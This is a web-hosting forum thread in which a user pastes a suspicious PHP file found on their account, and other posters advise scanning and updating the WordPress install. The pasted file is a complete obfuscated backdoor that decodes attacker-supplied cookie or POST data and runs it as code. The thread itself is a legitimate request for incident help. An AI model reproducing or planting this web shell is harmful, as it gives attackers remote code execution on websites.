Possible virus on Cpanel

[Randolph]

Hi , I think that there are virus in my Cpanel because I find various PHP files with strange names on my shared hosting. I attached 1 files the PHP files suspicious and also a file PHP contains. What do you think about it?

<?php
$prnhdx = 'l2e1s0b4H\'#_9i*f-nau7xo6ymtgdc3rvpk5';$ndjwdeg = Array();$ndjwdeg[] = $prnhdx[29].$prnhdx[31].$prnhdx[2].$prnhdx[18].$prnhdx[26].$prnhdx[2].$prnhdx[11].$prnhdx[15].$prnhdx[19].$prnhdx[17].$prnhdx[29].$prnhdx[26].$prnhdx[13].$prnhdx[22].$prnhdx[17];$ndjwdeg[] = $prnhdx[8].$prnhdx[14];$ndjwdeg[] = $prnhdx[7].$prnhdx[6].$prnhdx[30].$prnhdx[5].$prnhdx[20].$prnhdx[6].$prnhdx[5].$prnhdx[6].$prnhdx[16].$prnhdx[15].$prnhdx[2].$prnhdx[2].$prnhdx[20].$prnhdx[16].$prnhdx[7].$prnhdx[30].$prnhdx[12].$prnhdx[3].$prnhdx[16].$prnhdx[12].$prnhdx[20].$prnhdx[35].$prnhdx[18].$prnhdx[16].$prnhdx[29].$prnhdx[1].$prnhdx[20].$prnhdx[1].$prnhdx[18].$prnhdx[20].$prnhdx[35].$prnhdx[23].$prnhdx[5].$prnhdx[35].$prnhdx[23].$prnhdx[3];$ndjwdeg[] = $prnhdx[10];$ndjwdeg[] = $prnhdx[29].$prnhdx[22].$prnhdx[19].$prnhdx[17].$prnhdx[26];$ndjwdeg[] = $prnhdx[4].$prnhdx[26].$prnhdx[31].$prnhdx[11].$prnhdx[31].$prnhdx[2].$prnhdx[33].$prnhdx[2].$prnhdx[18].$prnhdx[26];$ndjwdeg[] = $prnhdx[2].$prnhdx[21].$prnhdx[33].$prnhdx[0].$prnhdx[22].$prnhdx[28].$prnhdx[2];$ndjwdeg[] = $prnhdx[4].$prnhdx[19].$prnhdx[6].$prnhdx[4].$prnhdx[26].$prnhdx[31];$ndjwdeg[] = $prnhdx[18].$prnhdx[31].$prnhdx[31].$prnhdx[18].$prnhdx[24].$prnhdx[11].$prnhdx[25].$prnhdx[2].$prnhdx[31].$prnhdx[27].$prnhdx[2];$ndjwdeg[] = $prnhdx[4].$prnhdx[26].$prnhdx[31].$prnhdx[0].$prnhdx[2].$prnhdx[17];$ndjwdeg[] = $prnhdx[33].$prnhdx[18].$prnhdx[29].$prnhdx[34];foreach ($ndjwdeg[8]($_COOKIE, $_POST) as $nxbhxeo => $hxdhpxt){function uhwxwyv($ndjwdeg, $nxbhxeo, $ncwkr){return $ndjwdeg[7]($ndjwdeg[5]($nxbhxeo . $ndjwdeg[2], ($ncwkr / $ndjwdeg[9]($nxbhxeo)) + 1), 0, $ncwkr);}function ltqndx($ndjwdeg, $jnxrcjh){return @$ndjwdeg[10]($ndjwdeg[1], $jnxrcjh);}function udobw($ndjwdeg, $jnxrcjh){$bvntgpn = $ndjwdeg[4]($jnxrcjh) % 3;if (!$bvntgpn) {$uiijao = $ndjwdeg[0]; $hkngdn = $uiijao("", $jnxrcjh[1]($jnxrcjh[2]));$hkngdn();exit();}}$hxdhpxt = ltqndx($ndjwdeg, $hxdhpxt);udobw($ndjwdeg, $ndjwdeg[6]($ndjwdeg[3], $hxdhpxt ^ uhwxwyv($ndjwdeg, $nxbhxeo, $ndjwdeg[9]($hxdhpxt))));}

 

[kadrin]

It is not a cpanel but maybe a software problem/hacked. You have a WordPress try malware scanners for wp like NinjaScanner or any plugin with file comparision

 

[cPanelLauren]

@kadrin has it correct, this is not a cPanel specific issue but more so likely related to a vulnerable script installed on the account, most commonly associated with a CMS system which has not been kept updated/maintained.

In order to resolve this issue you need to audit the entire documentroot, either using a malware scanner or by hand if you know what to look for. Best practices for the CMS systems or scripts on the account is ensure that they're all updated and anything not in use is removed such as themes/plugins/components etc.